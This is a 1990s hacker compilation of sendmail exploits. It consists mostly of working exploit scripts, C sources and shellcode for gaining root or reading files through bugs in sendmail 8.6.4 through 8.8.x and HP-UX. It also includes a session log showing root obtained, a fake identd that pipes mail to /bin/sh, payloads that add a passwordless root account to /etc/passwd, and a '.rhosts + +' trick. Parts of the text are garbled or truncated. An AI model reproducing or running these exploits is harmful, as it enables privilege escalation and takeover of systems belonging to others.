N8&A"-4WJ:/7H#?P%H]060%G&Z00P!DP-, 8NA9 D\&B*,Gatreus
M"Y$-X$=!(M1=D R9%R"'4$06M$/F!^0@E$)%? ^*GDO@R0% IQ I") %>LI"atreus
M9 A@BH*,@!0("0-/B**G-)"/#GJ20^9,(Q1H((00HSM ')Z'D$F,3@#3$ HXatreus
M$"**R!@@#P[$ D)JX<)$L&^%!4%&_/X'+&1\H0QT* ,>,/A#,H2!#F$ P _=atreus
M0 8 S &):G(B%.GP!3.PX0U'5.(/\9 &(B**44HL@QOLD(8RN4&+1,B"$X+0atreus
MA"0,(8Q<).(8T-"&-S3Q"W-\PQW.^(4^?I&/X88M=U*(0N_@%atreus
M,M2A#6W(0R/+,(:L]?$+0Z#"$Z3P!28D80I4Z*,6OT $37+2DZ 4Y27)\(8Oatreus
MG.&*8@@#&_!(AS?(80ZC9*4K82G+1M;REHJ,8R,?&1"=*T8I:]*(8S:A&-\K1CGKTHR -J4A'2M*2FO2D*$VI2E?*TI:Z]*4Patreus
MC:E,9TK3FMKTICC-J4YWRM.>^O2G0 VJ4(=*U*(:]:A(3:I2E\K4ICKUJ5"-atreus
MJE2G2M6J6O6J6,VJ5K?*U:YZ]:M@#:M8QTK6LIKUK&A-JUK7RM:VNO6M<(VKatreus
M7.=*U[K:]:YXS>M2_0,$UP&+!"'V!BPN"(5D !B !W4"6)U0;R&5*P Ratreus
M$()#[@$ L3XQ7"" 0;*HO H43OL'/SQ+%= ^+1]!"YT(VN=*=+atreus
MW>I:][K8S:YVM\O=[GKWN^ -KWC'2][RFO>\Z$VO>M?+WO:Z][WPC:]\YTO?atreus
+^MKWOOC-KW[WFUS=atreus
atreus
endatreus
----------------------- CuT HeRe -------------------------------------
Here it is the other script:
/* What follows is a sample run exercising the latest sendmail hole and the
script used to exploit this hole. This is a re-send; I neglected
to escape the "." in the sendmail script, leaving the program
slightly truncated. To fix this, I have escaped the . so prior
to executing this you must remove the \. (does that make any sense? :-)
There was also a small problem with nested quotes pointed out by Peter
Wemm which I have fixed.
This is the "small version" of the script; it assumes you have a sane
sendmail.cf. In this manner, it is not a particularly robust "breakin
script" but I believe it does illustrate how to exploit the bug.
This program uses "calc.c," the program mentioned by Timothy Newsham in
an earlier message. The program has been modified slightly so that it
gives better results (it would occasionally fail to locate the offset of
a config given a buggy sendmail. The fix is to force a sync() after
it generates a coredump.) The remainder of the program was written
by myself and a fellow student, Steven Dake.
We have held off on releasing this script until we were able to notify
the people responsible for system security at NAU. Locals subscribing
to this digest beware; sendmail on our machines has been patched! :-) */
Script started on Thu Mar 24 00:54:54 1994
[pine] [1] date
Thu Mar 24 00:54:57 MST 1994
[pine] [2] whoami
jwa
[pine] [3] id
uid=4473(jwa) gid=400(student)
[pine] [4] ls -l sendbug.sh
-rwx------ 1 jwa student 4893 Mar 24 00:46 sendbug.sh*
[pine] [5] sendbug.sh
Creating setid0 ...
Creating calc...
Scanning core image for /nau/local/lib/mail/sendmail.cf...
Creating alias.sh ...
Creating fake alias file...
Faking alias pointer in new config file...
Creating the sendmail script...
Executing /usr/lib/sendmail -
d4294935548.47,4294935549.116,4294935550.109,4294935551.112,4294935552.47,4294935553.115,429
4935554.109,4294935555.46,4294935556.9
Version 8.6.4
220-pine.cse.nau.edu Sendmail 8.6.4/WHOOP-v1.0 ready at Thu, 24 Mar 1994
00:55:21 -0700
220 ESMTP spoken here
250 pine.cse.nau.edu Hello jwa@localhost, pleased to meet you
250 ... Sender ok
250 ... Recipient ok
354 Enter mail, end with "." on a line by itself
250 AAA01803 Message accepted for delivery
503 Need MAIL before RCPT
503 Need MAIL command
500 Command unrecognized
500 Command unrecognized
221 pine.cse.nau.edu closing connection
setid0 is a suid shell. executing...
executing /bin/csh...
pine# whoami
root
pine# id
uid=0(root) gid=0(root)
pine# exit
pine# end of script.
. and here's the program.
#!/bin/sh
# exploit new sendmail bug to give us a root shell
# 24 mar 94 jwa/scd @nau.edu
# "short version"
# tested on sunos 5.2/sendmail 8.6.4
# location of sendmail
SENDMAIL=/usr/lib/sendmail
# location of original sendmail.cf file
CONFIG=/nau/local/lib/mail/sendmail.cf
#CONFIG=`strings $SENDMAIL | grep sendmail.cf`
# program to execute as root
SHELL=/bin/csh
TEMPDIR=/tmp/sendbug-tmp.$$
mkdir $TEMPDIR
chmod 700 $TEMPDIR
cd $TEMPDIR
cp $SENDMAIL sm
chmod 700 sm
echo "Creating setid0 ..."
cat > setid.c << _EOF_
/* set uid to zero, thus escaping the annoying csh and solaris sh
* problem..
*
* if (getuid() != geteuid()) {
* printf("permission denied, you root-hacker you.\n");
* exit(1);
* }
*
* .. must be run euid 0, obviously. with no args it runs /bin/sh,
* otherwise it runs the 1st arg.
*/
#include
main(argc, argv)
int argc;
char *argv[];
int uid;
setuid(0);
setgid(0);
seteuid(0); /* probabally redundant. */
setegid(0);
uid = getuid();
if (uid != 0) {
printf("setuid(0); failed! aborting..\n");
exit(1);
}
if (argc !=2) {
printf("executing /bin/sh...\n");
system("/bin/sh");
}
else
{
printf("executing %s...\n", argv[1]);
system(argv[1]);
}
_EOF_
cc -o setid0 setid.c
echo "Creating calc..."
cat > calc.c << _EOF_
/*
* Determines offset in sendmail of
* sendmail.cf file location.
* author: timothy newsham
*/
#include
gencore()
int pid;
int fd[2];
if(pipe(fd) < 0) {
perror("pipe");
exit(1);
return(0);
}
pid = fork();
if(!pid) {
int f = open("./out", O_RDWR|O_CREAT, 0666);
dup2(f, 1); dup2(fd[0], 0);
close(f); close(fd[1]); close(fd[0]);
execl("./sm","sm","-d0-9.90","-oQ.","-bs", 0);
perror("exec");
exit(0);
} else {
sleep(2);
kill(pid, 11);
}
close(fd[0]);
close(fd[1]);
main(argc,argv)
char **argv;
int argc;
unsigned int ConfFile,tTdvect,off;
gencore();
sync(); /* grr. */
tTdvect = find("ZZZZZZZZ", "core");
ConfFile = find(argv[1], "core");
if(!tTdvect || !ConfFile) {
return(1);
}
off = ConfFile - tTdvect;
printf("-d%u.%d,%u.%d,%u.%d,%u.%d,%u.%d,%u.%d,%u.%d,%u.%d,%u.%d,%u.%d,%u.0\n", off, '/', off+1, 't', off+2, 'm', off+3, 'p', off+4, '/', off+5, 's', \
off+6, 'm', off+7, '.', off+8, 'c', off+9, 'f', off+10);
int find(pattern, file)
char *pattern,*file;
int fd;
int i, addr;
char c;
fd = open(file, 0);
i = 0;
addr = 0;
while(read(fd, &c, 1) == 1) {
if(pattern[i] == c)
i++;
else
i=0;
if(pattern[i] == '\0') {
addr -= strlen(pattern);
return(addr);
}
addr++;
}
return(0);
_EOF_
cc calc.c -o calc
echo "Scanning core image for $CONFIG..."
DEBUGFLAGS=`calc $CONFIG`
echo "Creating alias.sh ..."
echo "#!/bin/sh
# this program will be executed when mail is sent to the fake alias.
# since solaris sh and csh and tcsh refuse to run when euid != realuid,
# we instead run the program we compiled above.
/bin/chmod 6777 $TEMPDIR/setid0
/bin/chown root $TEMPDIR/setid0
/bin/sync
" > alias.sh
chmod 755 alias.sh
echo "Creating fake alias file..."
echo "yash: |$TEMPDIR/alias.sh" > aliases
echo "Faking alias pointer in new config file..."
egrep -v '(OA|DZ|Ou|Og)' $CONFIG > /tmp/sm.cf
echo "
# hacks follow
OA/$TEMPDIR/aliases # our fake alias file
Ou0 # user ID to run as
Og0 # group ID to run as
DZWHOOP-v1.0" >> /tmp/sm.cf
echo "Creating the sendmail script..."
cat > sendmail.script << _EOF_
helo
mail from:
rcpt to:
data
yet another sendmail hole? suid whoop?
\. # oops.. delete \ prior to execution
quit
_EOF_
echo "Executing $SENDMAIL $DEBUGFLAGS -bs..."
$SENDMAIL $DEBUGFLAGS -bs < sendmail.script
# give it time to execute.
sleep 4
# cleanup in 5 seconds
(sleep 5; rm -rf $TEMPDIR ; rm /tmp/sm.cf) &
if [ -u setid0 ]
then
echo "setid0 is a suid shell. executing..."
cd /
$TEMPDIR/setid0 /bin/csh
echo "end of script."
exit 0
else
echo "setid0 is not suid; script failed."
echo "apparently, you don't have the bug. celebrate :-)"
exit 1
fi
--------------------------------- CuT HeRe --------------------------------
= -oE/filename bounce = *8.6.7*
Version affected: 8.6.7
A bug in Sendmail 8.6.7 allows anyone to read any file,
including the shadowed password file:
/usr/lib/sendmail -oE/etc/shadow bounce
From: your_username
= 8.6.9 = *8.6.9 or earlier*
Mail any file to yourself.
------8<-------------------Cut Here--------------------8<-------------------
# This is a shell archive. Save it in a file, remove anything before
# this line, and then unpack it by entering "sh file". Note, it may
# create directories; files and directories will be owned by you and
# have default permissions.
#
# This archive contains:
#
# description
# sm869.local
# sm869.remote
#
echo x - description
sed 's/^X//' >description << 'END-of-description'
X
XProgram: sm869.remote
X
Xyou can:
X
X run the body of the mail through a shell if
X sendmail is allowed to run a shell.
X
X write the whole message to a file.
X
X have it send back a file to an account you specify.
X
XThe last option is supposed to remove the file after sending
Xit but I found that it hasn't in my tests. Why? Well
Xit has multiple recipients, one of the recipients is a
Xrecipient that will never go through. So the data file
Xgets kept around until it gives up on that host. This
Xcan be several days.
X
XProblems:
X
X The action you specify will happen every 30minutes (the
X queue time, may be different) until it gives up sending
X to the unreachable host. (Actually this may be false.
X I haven't left it around long enough to see if this happens.
X Perhaps sendmail is smart enough to remove the other recipients
X that did get delievered from the queue file).
X
X If you send a file back to yourself it may get removed
X several days later. If you get the password file or
X some other critical file you had better be ready to clean
X up.
X
X Lots of logs. Its fairly obvious from the log files that
X some hokey pokey is going on. If you're sending a file
X back to yourself then you're pointing a finger at one
X of your accounts
X
XYou have to go into the program to change the options you
Xwant. The code is fairly well commented so this shouldn't
Xbe any problem.
X
XProgram: sm869.local
X
XSame thing as above really except it works even if sendmail
Xdoesnt check identd and you dont have to specify an unreachable
Xhost. The file goes straight to the queue.
X
END-of-description
echo x - sm869.local
sed 's/^X//' >sm869.local << 'END-of-sm869.local'
X#!/bin/sh
X#
X# Exploit hole in sendmail 8.6.9 and earlier.
X#
X
X# Either write a file or run a program.
X#ACTION="|/tmp/runme"
XACTION="/tmp/writeme"
X
X# Data file to read from and then remove
XDATAFILE="/tmp/abc"
X#DATAFILE=""
X
X# Who to run as
XRUNAS="bin"
X
X# Who to send mail to
XWHOAMI=`whoami`
XSENDTO=$WHOAMI
X#SENDTO="someone-else"
X
X# Build up arg and send it off
Xif [ -n "$DATAFILE" ] ; then
XARG="$WHOAMI
XD$DATAFILE
XC:$RUNAS
XR\"$ACTION\""
Xelse
XARG="$WHOAMI
XC:$RUNAS
XR\"$ACTION\""
Xfi
Xsendmail -odq -F"$ARG" $SENDTO << _END_
XThis is appearing in the mailbox
Xand also being piped to the program or
Xwritten to the file, UNLESS you specify
Xa datafile above. In that case the datafile
Xwill be written and erased and this text will
Xbe left (not deleted) in the queue directory.
X_END_
X
END-of-sm869.local
echo x - sm869.remote
sed 's/^X//' >sm869.remote << 'END-of-sm869.remote'
X#!/bin/sh
X#
X# exploit for sm869 or worse
X# identd must not be enabled (port 113 must be free)
X
X# this must be a host that mail can go to (MX not pointing elsewhere)
X# that we cant reach right now (ie. host doesnt exist anymore)
XUNREACHABLE="goofy.uhcc.hawaii.edu"
X
X# Commands to run on remote host
XCOMMANDS="touch /tmp/gotcha"
X
X# what host to run it on
XTARGET="localhost"
X
X# work in a temp dir
XTD=/tmp/.Xwork.$$
Xmkdir $TD
Xcd $TD
X
Xcat > a.c <<_END_
X#include
X#include
X#include
X
X/* run body of mail through shell run as daemon */
X#define REPLY "USERID : UNIX : a\nC:daemon\nR\"|sed
'1,/^$/d'|/bin/sh\"\nHXxx:
"
X
X#ifdef other_possibilities
X/* write to a file as daemon */
X#define REPLY "USERID : UNIX : a\nC:daemon\nR/tmp/writeme\nHXxx: "
X/* send back a file to someone and erase it */
X#define REPLY "USERID : UNIX :
a\nD/tmp/sendtome\nRmy@address.here\nHXxx: "
X#endif
X
Xreadline(fd, buf, len)
Xchar *buf;
X{
X int i = 0;
X
X while(i < len && read(fd, &buf[i], 1) == 1 && buf[i]) {
X if(buf[i] == '\r' || buf[i] == '\n')
X break;
X i++;
X }
X buf[i] = '\0';
X}
X
Xdie(str)
Xchar *str;
X{
X perror(str); exit(1);
X}
X
Xmain()
X{
X int s, s2, adlen;
X struct sockaddr_in ad;
X char buf[60];
X
X ad.sin_family = AF_INET;
X ad.sin_port = htons(113);
X ad.sin_addr.s_addr = INADDR_ANY;
X if((s = socket(AF_INET, SOCK_STREAM, 0)) < 0) die("socket");
X if(bind(s, (struct sockaddr *)&ad, sizeof(ad)) == -1) die("bind");
X if(listen(s, 1) == -1) die("listen");
X adlen = sizeof(ad);
X s2 = accept(s, (struct sockaddr *)&ad, &adlen);
X if(s2 == -1) die("accept");
X printf("Connection from %s port %d\n",
X inet_ntoa(ad.sin_addr), ntohs(ad.sin_port));
X readline(s2, buf, 50);
X sprintf(buf + strlen(buf), " : %s\n", REPLY);
X write(s2, buf, strlen(buf));
X}
X_END_
X
X# compile program
Xecho "compiling"
Xcc a.c -o ident
Xecho "running fake ident"
X./ident &
X
X# send to reomte
Xecho "talking to remote"
X(
X sleep 1; echo "helo"
X sleep 1; echo "mail from: "
X sleep 1; echo "rcpt to: "
X sleep 1; echo "data"
X echo "$COMMANDS"
X echo "."
X sleep 1; echo "quit"
X sleep 5
X) | telnet $TARGET 25
X
X# cleanup
Xcd /
Xrm -rf $TD
Xecho "done."
X
END-of-sm869.remote
exit
.................................. CuT HeRe ..................................
= 8.6.9 newlines = *8.6.9*
When a message is queued for delivery by sendmail, a pair of files are
written to the spool directory (/var/spool/mqueue on many systems).
One of these files (qf) contains information related to the
processing of the message (headers, sender, recipient, etc.). Taking
versions of sendmail prior to 8.6.10 as an example, one of the pieces
of information maintained in this file is the name of the controlling
user if mail is being delivered to a script (or file). By feeding
sendmail a recipient address that contains newlines, it is possible to
add lines to the queue file which specify a controlling user and an
executable to run with that users access level. The 8.6.10 patch
removes this hole, by stripping newlines from the recipient address
before writing the queue file.
EXPLOIT:
/* smh.c - Michael R. Widner - atreus (2/27/95)
*
* a quick hack to abuse sendmail 8.6.9 or whatever else is subject to this
* hole. It's really just a matter of passing newlines in arguments to
* sendmail and getting the stuff into the queue files. If we run this
* locally with -odq we are guaranteed that it will be queue, rather than
* processed immediately. Wait for the queue to get processed automatically
* or just run sendmail -q if you're impatient.
* usage: smh [ username [/path/to/sendmail]]
* It's worth noting that this is generally only good for getting bin.
* sendmail still wants to process the sendmail.cf file, which contains
* Ou1 and Og1 most of the time, limiting you to bin access. Is there
* a way around this?
* cc -o smh smh.c should do the trick. This just creates a bin owned
* mode 6777 copy of /bin/sh in /tmp called /tmp/newsh. Note that on some
* systems this is pretty much worthless, but you're smart enough to know
* which systems those are. Aren't you?
*/
#include
#include
#include
main(argc, argv)
int argc;
char **argv;
{
execlp(argv[2] ? argv[2] : "sendmail","sendmail","-odq","-p",
"ascii\nCroot\nMprog, P=/bin/sh, F=lsDFMeu, A=sh -c $u\nMlocal,
P=/bin/sh, F=lsDFMeu,
A=sh -c $u\nR<\"|/bin/cp /bin/sh /tmp/newsh\">\nR<\"|/bin/chmod 6777
/tmp/newsh\">\n$rascii ",
argv[1] ? argv[1] : "atreus",0);
}
................................ CuT HeRe ..................................
= 8.6.10 ident/newlines = *8.6.10*
This is a sendmail 8.6.10 attack based on the problems that sendmail
8.6.10 inherited from sendmail 8.6.9 .... Look at comments in the source.
Two exploits follow:
/* 8.6.10 sendmail attacker
*
* gcc ident.c -o ident
* add the following line to your /etc/inetd.conf:
* ident stream tcp nowait root /tmp/ident in.identd
* then kill -HUP inetd
*
* Not for not public use or disclosure.
*
* This is a sendmail 8.6.10 attack based on the problems that
* sendmail 8.6.10 inherited from sendmail 8.6.9 - blindly accepting
* information given to it by identd, which included bogus characters
* and newlines that it later appended to the queue file. Sendmail 8.6.10
* supposedly "strips" newlines before they are written, however, it
* converts them to spaces, and the following code demonstrates that
* quick work-around patches are never ever stable...
*
* NOTES: This hack only works when sendmail queues up the message for
* later delivery. This depends on the configuration of sendmail.cf and
* on the machine loading. If you can do something to drag the machine to
* its knees, then fire off this attack, you stand a much better chance of
* success.
*
* NOTES: If sendmail.cf is configured with Og1 and Ou1 lines (setting the
* default user to bin.bin), this exploit will not work.
*
* Also, since this only works when sendmail queues up the message for
* later delivery, the time of execution is dependant on how sendmail
* has been configured in sendmail.cf and machine load. Heavily loaded
* machines (or machines that have been intentionally flooded) have a
* greater possibility of this exploit working.
*
*/
#include
#include
#include
#include
#include
#include
#include
/* TIMEOUT is the number of seconds to wait before closing the connection if
* the client doesn't provide the port pairs.
*/
#define TIMEOUT 120
/* PROCINFO_BUFFER_SIZE must be bigger than 80 */
#define OUTPUT_BUFFER_SIZE 2048
#define SOCKET_BUFFER_SIZE 100
unsigned short lport = 0, rport = 0;
void
main ()
{
unsigned long here, there;
struct fd_set fdset;
struct timeval timeout;
char buffer[OUTPUT_BUFFER_SIZE];
char inbuffer[SOCKET_BUFFER_SIZE];
int len;
int fd;
FD_ZERO (&fdset);
FD_SET (0, &fdset);
timeout.tv_sec = TIMEOUT;
timeout.tv_usec = 0;
select (1, &fdset, NULL, NULL, &timeout);
len = read (0, inbuffer , SOCKET_BUFFER_SIZE - 1 );
if (len <= 0)
exit (0);
FD_SET (0, &fdset);
sprintf (buffer, "%s : USERID : UNIX : %s\r\n", inbuffer,
"Croot\r\nMprog, P=/bin/sh, F=lsDFMeu, A=sh -c $u\r\nMlocal,
P=/bin/sh, F=lsDFMeu, A=sh -c $u\r\nR<\"|/bin/echo toor::0:1:toor:/:/bin/csh
>> /etc/passwd\">\r\nR<\"|/usr/bin/chmod 4755 /usr/bin/time\");
write (1, buffer, strlen (buffer));
exit (0);
}
................................ CuT HeRe ..................................
Second Exploit follows:
/* 8.6.10 sendmail attacker
*
* gcc ident.c -o ident
* add the following line to your /etc/inetd.conf:
* ident stream tcp nowait root /tmp/ident in.identd
* then kill -HUP inetd
*
* Not for not public use or disclosure.
*
* This is a sendmail 8.6.10 attack based on the problems that
* sendmail 8.6.10 inherited from sendmail 8.6.9 - blindly accepting
* information given to it by identd, which included bogus characters
* and newlines that it later appended to the queue file. Sendmail 8.6.10
* supposedly "strips" newlines before they are written, however, it
* converts them to spaces, and the following code demonstrates that
* quick work-around patches are never ever stable...
*
* NOTES: If sendmail.cf is configured with Og1 and Ou1 lines (setting the
* default user to bin.bin), this exploit will not work.
*
* Also, since this only works when sendmail queues up the message for
* lar delivery, the time of execution is dependant on how sendmail
* has been configured in sendmail.cf and machine load. Heavily loaded
* machines (or machines that have been intentionally flooded) have a
* greater possibility of this exploit working.
*
*/
#include
#include
#include
#include
#include
#include
#include
/* TIMEOUT is the number of seconds to wait before closing the connection if
* the client doesn't provide the port pairs.
*/
#define TIMEOUT 120
/* PROCINFO_BUFFER_SIZE must be bigger than 80 */
#define OUTPUT_BUFFER_SIZE 2048
#define SOCKET_BUFFER_SIZE 100
unsigned short lport = 0, rport = 0;
void
main ()
{
unsigned long here, there;
struct fd_set fdset;
struct timeval timeout;
char buffer[OUTPUT_BUFFER_SIZE];
char inbuffer[SOCKET_BUFFER_SIZE];
int len;
int fd;
FD_ZERO (&fdset);
FD_SET (0, &fdset);
timeout.tv_sec = TIMEOUT;
timeout.tv_usec = 0;
select (1, &fdset, NULL, NULL, &timeout);
len = read (0, inbuffer , SOCKET_BUFFER_SIZE - 1 );
if (len <= 0)
exit (0);
FD_SET (0, &fdset);
sprintf (buffer, "%s : USERID : UNIX : %s\r\n", inbuffer,
"Croot\t\t\t\t\t\t\tMprog, P=/bin/sh, F=lsDFMeu, A=sh -c $u\t\t\t\t\t\t
Mlocal,
P=/bin/sh, F=lsDFMeu, A=sh -c $u\t\t\t\t\t\tR<\"|/bin/echo toor::0:1:toor:/:
/bin/csh >> /etc/passwd\">\t\t\tR<\"|/usr/bin/chmod 4755 /usr/bin/time\">\r\n
$rascii done");
write (1, buffer, strlen (buffer));
exit (0);
}
................................ CuT HeRe ..................................
= HP-UX = *HP-UX 9.x*
#!/bin/sh
# This works on virgin HPUX 9.x sendmail.cf
# The link can be set to any file on the system, it will append the contents
# of the email to the linked file (/etc/passwd, /etc/hosts.equiv, /.rhosts)..
# - sirsyko
r00tDIR=`grep root /etc/passwd |cut -f6 -d:`
RunDMC=`hostname`
if [ -f /tmp/dead.letter ]; then rm /tmp/dead.letter
fi
if [ -f /tmp/dead.letter ]; then
echo "Sorry, aint gonna work"
exit
fi
ln -s ${r00tDIR}/.rhosts /tmp/dead.letter
(
sleep 1
echo "helo"
echo "mail from: noone"
echo "rcpt to: noone@bounce"
echo "data"
echo "+ +"
echo "."
sleep 3
echo "quit"
) | telnet ${RunDMC} 25
sleep 5
remsh ${RunDMC} -l root
............... CuT HeRe ...............
What the r00t guys exploit does is just this:
- creates a symbolic link to the target file
(in this case '.rhosts' in root's directory) called '/tmp/dead.letter'.
- Then sends a message (containing lines you want to append) to a
non-existent user.
- Sendmail is configured (as default) to append lines of non-recipient
messages to '/tmp/dead.letter' and does it with root privileges.
If '/tmp/dead.letter' is a symbolic link Sendmail will follow it
and will overwrite the pre-existent file.
- Probably if Sendmail configuration has been changed to make it behave
in a different way, looking at the cf file could lead you to exploit
the bug the same.
= 8.7.5 gecos = *8.X.X <8.8.0* *TeSTed oN 8.6.12*
This bug was pointed out by Mudge of L0pht on Bugtraq on Sept 1996,
excerpts follow:
------
A buffer overflow condition exists that allows a user to overwrite the
information in a saved stack frame. When the function returns, the saved
frame is popped off of the stack and user code can be executed.
If a user is able to alter his/her gecos field then that user can
exploit a coding flaw in sendmail to elevate their effective UID to 0.
The actual problem in the code is quite apparent.
Inside recipient.c we find the following:
char nbuf[MAXNAME + 1];
...
buildfname(pw->pw_gecos, pw->pw_name, nbuf);
The problem is that nbuf[MAXNAME + 1] is a fixed length buffer and as
we will soon see, buildfname() does not honor this.
[ ..... ]
This particular problem has been fixed in Sendmail 8.8 beta.
_______
Here we have an example of exploit:
------------------------------ Cut Here ------------------------------------
/* Hi ! */
/* This is exploit for sendmail bug (version 8.6.12 for FreeBSD 2.1.0). */
/* If you have any problems with it, send letter to me. */
/* Have fun ! */
/* ----------------- Dedicated to my beautiful lady ------------------ */
/* Leshka Zakharoff, 1996. E-mail: leshka@chci.chuvashia.su */
#include
main()
{
void make_files();
make_files();
system("EDITOR=./hack;export EDITOR;chmod +x hack;chfn;/usr/sbin/sendmail;e
cho See result in /tmp");
}
void make_files()
{
int i,j;
FILE *f;
char nop_string[200];
char code_string[]=
{
"\xeb\x50" /* jmp
cont */
/* geteip: */ "\x5d" /* popl
%ebp */
"\x55" /* pushl
%ebp */
"\xff\x8d\xc3\xff\xff\xff" /* decl
0xffffffc3(%ebp) */
"\xff\x8d\xd7\xff\xff\xff" /* decl
0xffffffd7(%ebp) */
"\xc3" /* ret */
/* 0xffffffb4(%ebp): */ "cp /bin/sh /tmp"
/* 0xffffffc3(%ebp): */ "\x3c"
"chmod a=rsx /tmp/sh"
/* 0xffffffd7(%ebp): */ "\x01"
"-leshka-leshka-leshka-leshka-" /* reserved */
/* cont: */ "\xc7\xc4\x70\xcf\xbf\xef" /* movl
$0xefbfcf70,%esp */
"\xe8\xa5\xff\xff\xff" /* call
geteip */
"\x81\xc5\xb4\xff\xff\xff" /* addl
$0xb4ffffff,%ebp */
"\x55" /* pushl %ebp */
"\x55" /* pushl %ebp */
"\x68\xd0\x77\x04\x08" /* pushl
$0x80477d0
*/
"\xc3" /* ret */
"-leshka-leshka-leshka-leshka-" /* reserved */
"\xa0\xcf\xbf\xef"
};
j=269-sizeof(code_string);
for(i=0;i\"$1\"\n");
fprintf(f,"touch -t 2510711313 \"$1\"\n");
fclose(f);
}
................................ Cut Here ................................
= mime7to8() = *8.8.0*
An attacker can simply create a very large message in which each line
ends with "=" and use it to overwrite the sendmail process's stack.
Here the bug is only described... why doesn't someone write an exploit?!
------
There is a serious bug in the mime7to8() function of sendmail 8.8.0
which allows anyone who can send you mail to execute arbitrary code as
root on your machine. I think mime7to8() only gets invoked if you set
the undocumented "9" mailer flag. However, this flag is set by
default in the cf/mailer/local.m4 file that ships with sendmail
8.8.0. Thus, if you are using an old V6 format configuration file
from sendmail 8.7, you are probably safe, but if you generated a new
V7 configuration file, you are probably vulnerable to this bug.
Now here are the technical details:
The inner loop of mime7to8() looks like this:
u_char *obp;
char buf[MAXLINE];
u_char obuf[MAXLINE];
....
/* quoted-printable */
obp = obuf;
while (fgets(buf, sizeof buf, e->e_dfp) != NULL)
{
if (mime_fromqp((u_char *) buf, &obp, 0, MAXLINE) == 0)
continue;
putline((char *) obuf, mci);
obp = obuf;
}
When mime_fromqp() encounters a line that ends "=\n", it chops those
two characters off and returns 0 to indicate a continuation line.
This causes the while loop to continue, reading another input line and
appending its contents to obuf. However, when the loop continues
without resetting obp to obuf, there are fewer than MAXLINE characters
left in the output buffer. This means an attacker can simply create a
very large message in which each line ends with "=". Eventually obp
will move beyond the end of obuf and start writing almost arbitrary
data to the sendmail process's stack (as long as no bytes are 0).
--------
= smtpd = *8.7-8.8.2*
Read the exploit and don't bother:
------------------------------ Cut Here --------------------------------
#/bin/sh
#
#
# Hi !
# This is exploit for sendmail smtpd bug
# (ver. 8.7-8.8.2 for FreeBSD, Linux and may be other platforms).
# This shell script does a root shell in /tmp directory.
# If you have any problems with it, drop me a letter.
# Have fun !
#
#
# ----------------------
# ---------------------------------------------
# ----------------- Dedicated to my beautiful lady ------------------
# ---------------------------------------------
# ----------------------
#
# Leshka Zakharoff, 1996. E-mail: leshka@leshka.chuvashia.su
#
#
#
echo 'main() '>>leshka.c
echo '{ '>>leshka.c
echo ' execl("/usr/sbin/sendmail","/tmp/smtpd",0); '>>leshka.c
echo '} '>>leshka.c
#
#
echo 'main() '>>smtpd.c
echo '{ '>>smtpd.c
echo ' setuid(0); setgid(0); '>>smtpd.c
echo ' system("cp /bin/sh /tmp;chmod a=rsx /tmp/sh"); '>>smtpd.c
echo '} '>>smtpd.c
#
#
cc -o leshka leshka.c;cc -o /tmp/smtpd smtpd.c
./leshka
kill -HUP `ps -ax|grep /tmp/smtpd|grep -v grep|tr -d ' '|tr -cs "[:digit:]" "\n"
|head -n 1`
rm leshka.c leshka smtpd.c /tmp/smtpd
/tmp/sh
.............................. Cut Here ...................................
...............................oO THe eND Oo...............................
============= Credits ===============
All this info was mainly grabbed from:
- Bugtraq
- 8lgm
- In***ax Digest
- "Improving the Security of Your Site by Breaking Into it"
By Dan Farmer & Wietse Venema
- "Sendmail Bug Exploits List v.04b"
By Per1com/Xer0
- "Time For a Change" #1 'UNIX problems, for fun and exploit.'
By Ghost in the Machine